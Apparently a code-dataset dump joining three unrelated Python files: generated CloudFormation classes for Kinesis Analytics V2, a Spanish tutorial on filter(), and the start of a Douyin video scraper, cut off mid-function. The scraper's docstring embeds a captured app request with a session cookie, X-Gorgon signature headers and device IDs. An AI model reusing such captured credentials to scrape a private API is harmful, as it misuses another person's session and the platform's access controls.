    """Doc: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-kinesisanalyticsv2-application-input.html#cfn-kinesisanalyticsv2-application-input-inputschema"""
    # Required: intrinsic functions (e.g. Ref) are allowed via the
    # TypeHint/TypeCheck intrinsic-string types.
    rp_NamePrefix: TypeHint.intrinsic_str = attr.ib(
        default=None,
        validator=attr.validators.instance_of(TypeCheck.intrinsic_str_type),
        metadata={AttrMeta.PROPERTY_NAME: "NamePrefix"},
    )
    """Doc: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-kinesisanalyticsv2-application-input.html#cfn-kinesisanalyticsv2-application-input-nameprefix"""
    # Optional ("p_" prefix): None is accepted; dict input is coerced via from_dict.
    p_InputParallelism: typing.Union['PropApplicationInputParallelism', dict] = attr.ib(
        default=None,
        converter=PropApplicationInputParallelism.from_dict,
        validator=attr.validators.optional(attr.validators.instance_of(PropApplicationInputParallelism)),
        metadata={AttrMeta.PROPERTY_NAME: "InputParallelism"},
    )
    """Doc: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-kinesisanalyticsv2-application-input.html#cfn-kinesisanalyticsv2-application-input-inputparallelism"""
    p_InputProcessingConfiguration: typing.Union['PropApplicationInputProcessingConfiguration', dict] = attr.ib(
        default=None,
        converter=PropApplicationInputProcessingConfiguration.from_dict,
        validator=attr.validators.optional(attr.validators.instance_of(PropApplicationInputProcessingConfiguration)),
        metadata={AttrMeta.PROPERTY_NAME: "InputProcessingConfiguration"},
    )
    """Doc: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-kinesisanalyticsv2-application-input.html#cfn-kinesisanalyticsv2-application-input-inputprocessingconfiguration"""
    # Optional: Kinesis Data Firehose delivery stream as the input source.
    p_KinesisFirehoseInput: typing.Union['PropApplicationKinesisFirehoseInput', dict] = attr.ib(
        default=None,
        converter=PropApplicationKinesisFirehoseInput.from_dict,
        validator=attr.validators.optional(attr.validators.instance_of(PropApplicationKinesisFirehoseInput)),
        metadata={AttrMeta.PROPERTY_NAME: "KinesisFirehoseInput"},
    )
    """Doc: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-kinesisanalyticsv2-application-input.html#cfn-kinesisanalyticsv2-application-input-kinesisfirehoseinput"""
    # Optional: Kinesis data stream as the input source.
    p_KinesisStreamsInput: typing.Union['PropApplicationKinesisStreamsInput', dict] = attr.ib(
        default=None,
        converter=PropApplicationKinesisStreamsInput.from_dict,
        validator=attr.validators.optional(attr.validators.instance_of(PropApplicationKinesisStreamsInput)),
        metadata={AttrMeta.PROPERTY_NAME: "KinesisStreamsInput"},
    )
    """Doc: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-kinesisanalyticsv2-application-input.html#cfn-kinesisanalyticsv2-application-input-kinesisstreamsinput"""
@attr.s
class PropApplicationSqlApplicationConfiguration(Property):
    """
    AWS Object Type = "AWS::KinesisAnalyticsV2::Application.SqlApplicationConfiguration"
    Resource Document: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-kinesisanalyticsv2-application-sqlapplicationconfiguration.html
    Property Document:
    
    - ``p_Inputs``: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-kinesisanalyticsv2-application-sqlapplicationconfiguration.html#cfn-kinesisanalyticsv2-application-sqlapplicationconfiguration-inputs
    """
    # CloudFormation type identifier for this property object.
    AWS_OBJECT_TYPE = "AWS::KinesisAnalyticsV2::Application.SqlApplicationConfiguration"
    # Optional list ("p_" prefix): None is accepted; list elements may be dicts
    # (coerced via from_list) and the whole list is validated by deep_iterable.
    p_Inputs: typing.List[typing.Union['PropApplicationInput', dict]] = attr.ib(
        default=None,
        converter=PropApplicationInput.from_list,
        validator=attr.validators.optional(attr.validators.deep_iterable(member_validator=attr.validators.instance_of(PropApplicationInput), iterable_validator=attr.validators.instance_of(list))),
        metadata={AttrMeta.PROPERTY_NAME: "Inputs"},
    )
    """Doc: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-kinesisanalyticsv2-application-sqlapplicationconfiguration.html#cfn-kinesisanalyticsv2-application-sqlapplicationconfiguration-inputs"""
@attr.s
class PropApplicationReferenceDataSourceReferenceDataSource(Property):
    """
    AWS Object Type = "AWS::KinesisAnalyticsV2::ApplicationReferenceDataSource.ReferenceDataSource"
    Resource Document: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-kinesisanalyticsv2-applicationreferencedatasource-referencedatasource.html
    Property Document:
    
    - ``rp_ReferenceSchema``: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-kinesisanalyticsv2-applicationreferencedatasource-referencedatasource.html#cfn-kinesisanalyticsv2-applicationreferencedatasource-referencedatasource-referenceschema
    - ``p_S3ReferenceDataSource``: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-kinesisanalyticsv2-applicationreferencedatasource-referencedatasource.html#cfn-kinesisanalyticsv2-applicationreferencedatasource-referencedatasource-s3referencedatasource
    - ``p_TableName``: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-kinesisanalyticsv2-applicationreferencedatasource-referencedatasource.html#cfn-kinesisanalyticsv2-applicationreferencedatasource-referencedatasource-tablename
    """
    # CloudFormation type identifier for this property object.
    AWS_OBJECT_TYPE = "AWS::KinesisAnalyticsV2::ApplicationReferenceDataSource.ReferenceDataSource"
    # Required ("rp_" prefix): validator is not wrapped in optional(), so the
    # default of None fails validation unless the caller supplies a value.
    rp_ReferenceSchema: typing.Union['PropApplicationReferenceDataSourceReferenceSchema', dict] = attr.ib(
        default=None,
        converter=PropApplicationReferenceDataSourceReferenceSchema.from_dict,
        validator=attr.validators.instance_of(PropApplicationReferenceDataSourceReferenceSchema),
        metadata={AttrMeta.PROPERTY_NAME: "ReferenceSchema"},
    )
    """Doc: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-kinesisanalyticsv2-applicationreferencedatasource-referencedatasource.html#cfn-kinesisanalyticsv2-applicationreferencedatasource-referencedatasource-referenceschema"""
    # Optional ("p_" prefix): None is accepted; dict input is coerced via from_dict.
    p_S3ReferenceDataSource: typing.Union['PropApplicationReferenceDataSourceS3ReferenceDataSource', dict] = attr.ib(
        default=None,
        converter=PropApplicationReferenceDataSourceS3ReferenceDataSource.from_dict,
        validator=attr.validators.optional(attr.validators.instance_of(PropApplicationReferenceDataSourceS3ReferenceDataSource)),
        metadata={AttrMeta.PROPERTY_NAME: "S3ReferenceDataSource"},
    )
    """Doc: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-kinesisanalyticsv2-applicationreferencedatasource-referencedatasource.html#cfn-kinesisanalyticsv2-applicationreferencedatasource-referencedatasource-s3referencedatasource"""
    # Optional: intrinsic functions are allowed via the TypeHint/TypeCheck
    # intrinsic-string types.
    p_TableName: TypeHint.intrinsic_str = attr.ib(
        default=None,
        validator=attr.validators.optional(attr.validators.instance_of(TypeCheck.intrinsic_str_type)),
        metadata={AttrMeta.PROPERTY_NAME: "TableName"},
    )
    """Doc: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-kinesisanalyticsv2-applicationreferencedatasource-referencedatasource.html#cfn-kinesisanalyticsv2-applicationreferencedatasource-referencedatasource-tablename"""
@attr.s
class PropApplicationApplicationConfiguration(Property):
    """
    AWS Object Type = "AWS::KinesisAnalyticsV2::Application.ApplicationConfiguration"
    Resource Document: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-kinesisanalyticsv2-application-applicationconfiguration.html
    Property Document:
    - ``p_ApplicationCodeConfiguration``: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-kinesisanalyticsv2-application-applicationconfiguration.html#cfn-kinesisanalyticsv2-application-applicationconfiguration-applicationcodeconfiguration
    - ``p_ApplicationSnapshotConfiguration``: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-kinesisanalyticsv2-application-applicationconfiguration.html#cfn-kinesisanalyticsv2-application-applicationconfiguration-applicationsnapshotconfiguration
    - ``p_EnvironmentProperties``: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-kinesisanalyticsv2-application-applicationconfiguration.html#cfn-kinesisanalyticsv2-application-applicationconfiguration-environmentproperties
    - ``p_FlinkApplicationConfiguration``: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-kinesisanalyticsv2-application-applicationconfiguration.html#cfn-kinesisanalyticsv2-application-applicationconfiguration-flinkapplicationconfiguration
    - ``p_SqlApplicationConfiguration``: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-kinesisanalyticsv2-application-applicationconfiguration.html#cfn-kinesisanalyticsv2-application-applicationconfiguration-sqlapplicationconfiguration
    - ``p_ZeppelinApplicationConfiguration``: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-kinesisanalyticsv2-application-applicationconfiguration.html#cfn-kinesisanalyticsv2-application-applicationconfiguration-zeppelinapplicationconfiguration
    """
    AWS_OBJECT_TYPE = "AWS::KinesisAnalyticsV2::Application.ApplicationConfiguration"
    # Generated-style attrs declaration: each ``attr.ib`` below maps one
    # CloudFormation property. ``converter=<Prop>.from_dict`` lets callers pass
    # a plain dict in place of the nested Prop class, and wrapping the
    # validator in ``attr.validators.optional(...)`` marks the property as not
    # required (``default=None``). Field order here defines the attrs-generated
    # ``__init__`` signature, so it must not be reordered.
    p_ApplicationCodeConfiguration: typing.Union['PropApplicationApplicationCodeConfiguration', dict] = attr.ib(
        default=None,
        converter=PropApplicationApplicationCodeConfiguration.from_dict,
        validator=attr.validators.optional(attr.validators.instance_of(PropApplicationApplicationCodeConfiguration)),
        metadata={AttrMeta.PROPERTY_NAME: "ApplicationCodeConfiguration"},
    )
    """Doc: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-kinesisanalyticsv2-application-applicationconfiguration.html#cfn-kinesisanalyticsv2-application-applicationconfiguration-applicationcodeconfiguration"""
    p_ApplicationSnapshotConfiguration: typing.Union['PropApplicationApplicationSnapshotConfiguration', dict] = attr.ib(
        default=None,
        converter=PropApplicationApplicationSnapshotConfiguration.from_dict,
        validator=attr.validators.optional(attr.validators.instance_of(PropApplicationApplicationSnapshotConfiguration)),
        metadata={AttrMeta.PROPERTY_NAME: "ApplicationSnapshotConfiguration"},
    )
    """Doc: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-kinesisanalyticsv2-application-applicationconfiguration.html#cfn-kinesisanalyticsv2-application-applicationconfiguration-applicationsnapshotconfiguration"""
    p_EnvironmentProperties: typing.Union['PropApplicationEnvironmentProperties', dict] = attr.ib(
        default=None,
        converter=PropApplicationEnvironmentProperties.from_dict,
        validator=attr.validators.optional(attr.validators.instance_of(PropApplicationEnvironmentProperties)),
        metadata={AttrMeta.PROPERTY_NAME: "EnvironmentProperties"},
    )
    """Doc: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-kinesisanalyticsv2-application-applicationconfiguration.html#cfn-kinesisanalyticsv2-application-applicationconfiguration-environmentproperties"""
    p_FlinkApplicationConfiguration: typing.Union['PropApplicationFlinkApplicationConfiguration', dict] = attr.ib(
        default=None,
        converter=PropApplicationFlinkApplicationConfiguration.from_dict,
        validator=attr.validators.optional(attr.validators.instance_of(PropApplicationFlinkApplicationConfiguration)),
        metadata={AttrMeta.PROPERTY_NAME: "FlinkApplicationConfiguration"},
    )
    """Doc: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-kinesisanalyticsv2-application-applicationconfiguration.html#cfn-kinesisanalyticsv2-application-applicationconfiguration-flinkapplicationconfiguration"""
    p_SqlApplicationConfiguration: typing.Union['PropApplicationSqlApplicationConfiguration', dict] = attr.ib(
        default=None,
        converter=PropApplicationSqlApplicationConfiguration.from_dict,
        validator=attr.validators.optional(attr.validators.instance_of(PropApplicationSqlApplicationConfiguration)),
        metadata={AttrMeta.PROPERTY_NAME: "SqlApplicationConfiguration"},
    )
    """Doc: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-kinesisanalyticsv2-application-applicationconfiguration.html#cfn-kinesisanalyticsv2-application-applicationconfiguration-sqlapplicationconfiguration"""
    p_ZeppelinApplicationConfiguration: typing.Union['PropApplicationZeppelinApplicationConfiguration', dict] = attr.ib(
        default=None,
        converter=PropApplicationZeppelinApplicationConfiguration.from_dict,
        validator=attr.validators.optional(attr.validators.instance_of(PropApplicationZeppelinApplicationConfiguration)),
        metadata={AttrMeta.PROPERTY_NAME: "ZeppelinApplicationConfiguration"},
    )
    """Doc: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-kinesisanalyticsv2-application-applicationconfiguration.html#cfn-kinesisanalyticsv2-application-applicationconfiguration-zeppelinapplicationconfiguration"""
#--- Resource declaration ---
@attr.s
class ApplicationCloudWatchLoggingOption(Resource):
    """
    AWS Object Type = "AWS::KinesisAnalyticsV2::ApplicationCloudWatchLoggingOption"
    Resource Document: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-kinesisanalyticsv2-applicationcloudwatchloggingoption.html
    Property Document:
    - ``rp_ApplicationName``: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-kinesisanalyticsv2-applicationcloudwatchloggingoption.html#cfn-kinesisanalyticsv2-applicationcloudwatchloggingoption-applicationname
    - ``rp_CloudWatchLoggingOption``: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-kinesisanalyticsv2-applicationcloudwatchloggingoption.html#cfn-kinesisanalyticsv2-applicationcloudwatchloggingoption-cloudwatchloggingoption
    """
    AWS_OBJECT_TYPE = "AWS::KinesisAnalyticsV2::ApplicationCloudWatchLoggingOption"
    # ``rp_`` fields are required: their validators are NOT wrapped in
    # ``attr.validators.optional``, so passing None fails validation even
    # though ``default=None`` is declared.
    rp_ApplicationName: TypeHint.intrinsic_str = attr.ib(
        default=None,
        validator=attr.validators.instance_of(TypeCheck.intrinsic_str_type),
        metadata={AttrMeta.PROPERTY_NAME: "ApplicationName"},
    )
    """Doc: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-kinesisanalyticsv2-applicationcloudwatchloggingoption.html#cfn-kinesisanalyticsv2-applicationcloudwatchloggingoption-applicationname"""
    # Accepts a plain dict as well, coerced via ``from_dict``.
    rp_CloudWatchLoggingOption: typing.Union['PropApplicationCloudWatchLoggingOptionCloudWatchLoggingOption', dict] = attr.ib(
        default=None,
        converter=PropApplicationCloudWatchLoggingOptionCloudWatchLoggingOption.from_dict,
        validator=attr.validators.instance_of(PropApplicationCloudWatchLoggingOptionCloudWatchLoggingOption),
        metadata={AttrMeta.PROPERTY_NAME: "CloudWatchLoggingOption"},
    )
    """Doc: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-kinesisanalyticsv2-applicationcloudwatchloggingoption.html#cfn-kinesisanalyticsv2-applicationcloudwatchloggingoption-cloudwatchloggingoption"""
@attr.s
class Application(Resource):
    """
    AWS Object Type = "AWS::KinesisAnalyticsV2::Application"
    Resource Document: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-kinesisanalyticsv2-application.html
    Property Document:
    - ``rp_RuntimeEnvironment``: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-kinesisanalyticsv2-application.html#cfn-kinesisanalyticsv2-application-runtimeenvironment
    - ``rp_ServiceExecutionRole``: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-kinesisanalyticsv2-application.html#cfn-kinesisanalyticsv2-application-serviceexecutionrole
    - ``p_ApplicationConfiguration``: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-kinesisanalyticsv2-application.html#cfn-kinesisanalyticsv2-application-applicationconfiguration
    - ``p_ApplicationDescription``: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-kinesisanalyticsv2-application.html#cfn-kinesisanalyticsv2-application-applicationdescription
    - ``p_ApplicationMode``: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-kinesisanalyticsv2-application.html#cfn-kinesisanalyticsv2-application-applicationmode
    - ``p_ApplicationName``: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-kinesisanalyticsv2-application.html#cfn-kinesisanalyticsv2-application-applicationname
    - ``p_Tags``: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-kinesisanalyticsv2-application.html#cfn-kinesisanalyticsv2-application-tags
    """
    AWS_OBJECT_TYPE = "AWS::KinesisAnalyticsV2::Application"
    # ``rp_`` fields are required (validator not wrapped in ``optional``);
    # ``p_`` fields are optional. Field order fixes the attrs ``__init__``
    # signature, so do not reorder.
    rp_RuntimeEnvironment: TypeHint.intrinsic_str = attr.ib(
        default=None,
        validator=attr.validators.instance_of(TypeCheck.intrinsic_str_type),
        metadata={AttrMeta.PROPERTY_NAME: "RuntimeEnvironment"},
    )
    """Doc: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-kinesisanalyticsv2-application.html#cfn-kinesisanalyticsv2-application-runtimeenvironment"""
    rp_ServiceExecutionRole: TypeHint.intrinsic_str = attr.ib(
        default=None,
        validator=attr.validators.instance_of(TypeCheck.intrinsic_str_type),
        metadata={AttrMeta.PROPERTY_NAME: "ServiceExecutionRole"},
    )
    """Doc: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-kinesisanalyticsv2-application.html#cfn-kinesisanalyticsv2-application-serviceexecutionrole"""
    # Nested configuration object; a plain dict is coerced via ``from_dict``.
    p_ApplicationConfiguration: typing.Union['PropApplicationApplicationConfiguration', dict] = attr.ib(
        default=None,
        converter=PropApplicationApplicationConfiguration.from_dict,
        validator=attr.validators.optional(attr.validators.instance_of(PropApplicationApplicationConfiguration)),
        metadata={AttrMeta.PROPERTY_NAME: "ApplicationConfiguration"},
    )
    """Doc: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-kinesisanalyticsv2-application.html#cfn-kinesisanalyticsv2-application-applicationconfiguration"""
    p_ApplicationDescription: TypeHint.intrinsic_str = attr.ib(
        default=None,
        validator=attr.validators.optional(attr.validators.instance_of(TypeCheck.intrinsic_str_type)),
        metadata={AttrMeta.PROPERTY_NAME: "ApplicationDescription"},
    )
    """Doc: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-kinesisanalyticsv2-application.html#cfn-kinesisanalyticsv2-application-applicationdescription"""
    p_ApplicationMode: TypeHint.intrinsic_str = attr.ib(
        default=None,
        validator=attr.validators.optional(attr.validators.instance_of(TypeCheck.intrinsic_str_type)),
        metadata={AttrMeta.PROPERTY_NAME: "ApplicationMode"},
    )
    """Doc: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-kinesisanalyticsv2-application.html#cfn-kinesisanalyticsv2-application-applicationmode"""
    p_ApplicationName: TypeHint.intrinsic_str = attr.ib(
        default=None,
        validator=attr.validators.optional(attr.validators.instance_of(TypeCheck.intrinsic_str_type)),
        metadata={AttrMeta.PROPERTY_NAME: "ApplicationName"},
    )
    """Doc: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-kinesisanalyticsv2-application.html#cfn-kinesisanalyticsv2-application-applicationname"""
    # List of Tag objects; a list of dicts is coerced via ``Tag.from_list``,
    # and the deep_iterable validator checks every member.
    p_Tags: typing.List[typing.Union[Tag, dict]] = attr.ib(
        default=None,
        converter=Tag.from_list,
        validator=attr.validators.optional(attr.validators.deep_iterable(member_validator=attr.validators.instance_of(Tag), iterable_validator=attr.validators.instance_of(list))),
        metadata={AttrMeta.PROPERTY_NAME: "Tags"},
    )
    """Doc: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-kinesisanalyticsv2-application.html#cfn-kinesisanalyticsv2-application-tags"""
@attr.s
class ApplicationOutput(Resource):
    """
    AWS Object Type = "AWS::KinesisAnalyticsV2::ApplicationOutput"
    Resource Document: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-kinesisanalyticsv2-applicationoutput.html
    Property Document:
    - ``rp_ApplicationName``: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-kinesisanalyticsv2-applicationoutput.html#cfn-kinesisanalyticsv2-applicationoutput-applicationname
    - ``rp_Output``: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-kinesisanalyticsv2-applicationoutput.html#cfn-kinesisanalyticsv2-applicationoutput-output
    """
    AWS_OBJECT_TYPE = "AWS::KinesisAnalyticsV2::ApplicationOutput"
    # Both fields are required: their validators are not wrapped in
    # ``attr.validators.optional``, so None is rejected at construction.
    rp_ApplicationName: TypeHint.intrinsic_str = attr.ib(
        default=None,
        validator=attr.validators.instance_of(TypeCheck.intrinsic_str_type),
        metadata={AttrMeta.PROPERTY_NAME: "ApplicationName"},
    )
    """Doc: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-kinesisanalyticsv2-applicationoutput.html#cfn-kinesisanalyticsv2-applicationoutput-applicationname"""
    # Accepts a plain dict as well, coerced via ``from_dict``.
    rp_Output: typing.Union['PropApplicationOutputOutput', dict] = attr.ib(
        default=None,
        converter=PropApplicationOutputOutput.from_dict,
        validator=attr.validators.instance_of(PropApplicationOutputOutput),
        metadata={AttrMeta.PROPERTY_NAME: "Output"},
    )
    """Doc: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-kinesisanalyticsv2-applicationoutput.html#cfn-kinesisanalyticsv2-applicationoutput-output"""
@attr.s
class ApplicationReferenceDataSource(Resource):
    """
    AWS Object Type = "AWS::KinesisAnalyticsV2::ApplicationReferenceDataSource"
    Resource Document: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-kinesisanalyticsv2-applicationreferencedatasource.html
    Property Document:
    - ``rp_ApplicationName``: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-kinesisanalyticsv2-applicationreferencedatasource.html#cfn-kinesisanalyticsv2-applicationreferencedatasource-applicationname
    - ``rp_ReferenceDataSource``: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-kinesisanalyticsv2-applicationreferencedatasource.html#cfn-kinesisanalyticsv2-applicationreferencedatasource-referencedatasource
    """
    AWS_OBJECT_TYPE = "AWS::KinesisAnalyticsV2::ApplicationReferenceDataSource"
    # Both fields are required (validators not wrapped in ``optional``).
    rp_ApplicationName: TypeHint.intrinsic_str = attr.ib(
        default=None,
        validator=attr.validators.instance_of(TypeCheck.intrinsic_str_type),
        metadata={AttrMeta.PROPERTY_NAME: "ApplicationName"},
    )
    """Doc: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-kinesisanalyticsv2-applicationreferencedatasource.html#cfn-kinesisanalyticsv2-applicationreferencedatasource-applicationname"""
    # Accepts a plain dict as well, coerced via ``from_dict``.
    rp_ReferenceDataSource: typing.Union['PropApplicationReferenceDataSourceReferenceDataSource', dict] = attr.ib(
        default=None,
        converter=PropApplicationReferenceDataSourceReferenceDataSource.from_dict,
        validator=attr.validators.instance_of(PropApplicationReferenceDataSourceReferenceDataSource),
        metadata={AttrMeta.PROPERTY_NAME: "ReferenceDataSource"},
    )
    """Doc: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-kinesisanalyticsv2-applicationreferencedatasource.html#cfn-kinesisanalyticsv2-applicationreferencedatasource-referencedatasource"""
| 70.662987 | 292 | 0.806572 |
f51eff90ca841ee72accff3faef75c4e7bd858be | 1,035 | py | Python | Curso/paquete/41_filter.py | jsalmoralp/Python-Proyecto-Apuntes | cf4265e08e947aca1dbe9ec4ed1dfb7cb10e9309 | [
"MIT"
] | null | null | null | Curso/paquete/41_filter.py | jsalmoralp/Python-Proyecto-Apuntes | cf4265e08e947aca1dbe9ec4ed1dfb7cb10e9309 | [
"MIT"
] | null | null | null | Curso/paquete/41_filter.py | jsalmoralp/Python-Proyecto-Apuntes | cf4265e08e947aca1dbe9ec4ed1dfb7cb10e9309 | [
"MIT"
] | null | null | null | """
Filter: Funciones de orden superior (programación funcional).
Verifica que los elementos de una lista cumplan una determinada condición, devolviendo
un objeto iterable (iterador) con los elementos que cumplieron con la condición.
"""
# Demo: select elements of a list that satisfy a condition, first with a
# named predicate, then with an inline one. Output is identical to the
# original ``filter(...)`` version.
edades = [12, 11, 24, 36, 8, 6, 10, 41, 32, 58, 14, 50, 7]
def mayor_edad(edad):
    # Predicate: adult when the age is at least 18.
    return edad >= 18
# Adults (>= 18), kept in their original order.
edades_mayores_edad = [edad for edad in edades if mayor_edad(edad)]
print(edades_mayores_edad)
# Minors (< 18), selected with an inline condition.
edades_menores_edad = [edad for edad in edades if edad < 18]
print(edades_menores_edad)
class Persona:
    """A person with a name (``nombre``) and an age (``edad``)."""
    def __init__(self, nom, eda):
        # Parameter names are kept; callers may pass them by keyword.
        self.nombre = nom
        self.edad = eda
    def __str__(self):
        # Same text as the original "{0} tiene {1} años." template.
        return f"{self.nombre} tiene {self.edad} años."
# Sample people used to demonstrate filtering objects by attribute.
personas = [
    Persona("Alberto", 32),
    Persona("Anna", 16),
    Persona("Andy", 27),
    Persona("Jesús", 25),
    Persona("Cecilia", 19),
    Persona("Laura", 30)
]
# BUG FIX: the original predicate read ``pax.eadad`` -- a typo for the
# ``edad`` attribute set in Persona.__init__ -- so this line raised
# AttributeError at runtime before any person was printed.
# NOTE(review): the (misspelled) variable name below is kept deliberately so
# any existing reference to it keeps working; consider renaming separately.
perosnas_mayores_edad = list(filter(lambda pax: pax.edad >= 18, personas))
for per in perosnas_mayores_edad:
    print(per)
| 23.522727 | 86 | 0.676329 |
e1fafbf1c177c2e91863fff7c640cad693c00f12 | 4,478 | py | Python | 抖音爬取签名,喜欢列表和关注列表/爬取抖音的用户信息和视频连接/douying.py | 13060923171/xianmu | 3deb9cdcf4ed1d821043ba1d3947ff35697e4aae | [
"MIT"
] | 29 | 2020-08-02T12:06:10.000Z | 2022-03-07T17:51:54.000Z | 抖音爬取签名,喜欢列表和关注列表/爬取抖音的用户信息和视频连接/douying.py | 13060923171/xianmu | 3deb9cdcf4ed1d821043ba1d3947ff35697e4aae | [
"MIT"
] | 3 | 2020-08-16T15:56:47.000Z | 2021-11-20T21:49:59.000Z | 抖音爬取签名,喜欢列表和关注列表/爬取抖音的用户信息和视频连接/douying.py | 13060923171/xianmu | 3deb9cdcf4ed1d821043ba1d3947ff35697e4aae | [
"MIT"
] | 15 | 2020-08-16T08:28:08.000Z | 2021-09-29T07:17:38.000Z | import requests
import urllib3
'''
GET https://api3-core-c-hl.amemv.com/aweme/v1/aweme/post/?source=0&publish_video_strategy_type=0&max_cursor=1587528101000&sec_user_id=MS4wLjABAAAA4s3jerVDPUA_xvyoGhRypnn8ijAtUfrt9rCWL2aXxtU&count=10&ts=1587635299&host_abi=armeabi-v7a&_rticket=1587635299508&mcc_mnc=46007& HTTP/1.1
Host: api3-core-c-hl.amemv.com
Connection: keep-alive
Cookie: odin_tt=fab0188042f9c0722c90b1fbaf5233d30ddb78a41267bacbfc7c1fb216d37344df795f4e08e975d557d0c274b1c761da039574e4eceaae4a8441f72167d64afb
X-SS-REQ-TICKET: 1587635299505
sdk-version: 1
X-SS-DP: 1128
x-tt-trace-id: 00-a67026290de17aa15402ce8ee4a90468-a67026290de17aa1-01
User-Agent: com.ss.android.ugc.aweme/100801 (Linux; U; Android 5.1.1; zh_CN; MI 9; Build/NMF26X; Cronet/TTNetVersion:8109b77c 2020-04-15 QuicVersion:0144d358 2020-03-24)
X-Gorgon: 0404c0d100004fe124c18b36d03baf0768c181e105b1af5e8167
X-Khronos: 1587635299
x-common-params-v2: os_api=22&device_platform=android&device_type=MI%209&iid=78795828897640&version_code=100800&app_name=aweme&openudid=80c5f2708a3b6304&device_id=3966668942355688&os_version=5.1.1&aid=1128&channel=tengxun_new&ssmix=a&manifest_version_code=100801&dpi=320&cdid=e390170c-0cb5-42ad-8bf6-d25dc4c7e3a3&version_name=10.8.0&resolution=900*1600&language=zh&device_brand=Xiaomi&app_type=normal&ac=wifi&update_version_code=10809900&uuid=863254643501389
'''
# Download helper. (Original comment, translated: "video download code;
# the videos are saved for this Douyin account.")
def download_video(url, title):
    """Fetch ``url`` and save the response body as ``<title>.mp4``."""
    # Open first, then fetch -- same order of side effects as the original.
    target = "{}.mp4".format(title)
    with open(target, "wb") as output_file:
        output_file.write(requests.get(url).content)
    print("下载视频{}完毕".format(title))
# How to scrape the videos posted by one account through the app's API.
def get_video():
    """Fetch one page of a user's posted videos and download each one.

    The endpoint and header values below were captured with the Fiddler
    proxy from the Douyin Android app; the cookie/token/signature fields are
    session specific and expire, so expect to re-capture them.
    """
    # The URL of the user's post list, captured with Fiddler.
    # BUG FIX: the captured HTTP request line had been pasted verbatim as
    # "GET <url> HTTP/1.1", which requests rejects (no connection adapter
    # for that pseudo-scheme). Only the bare URL belongs here.
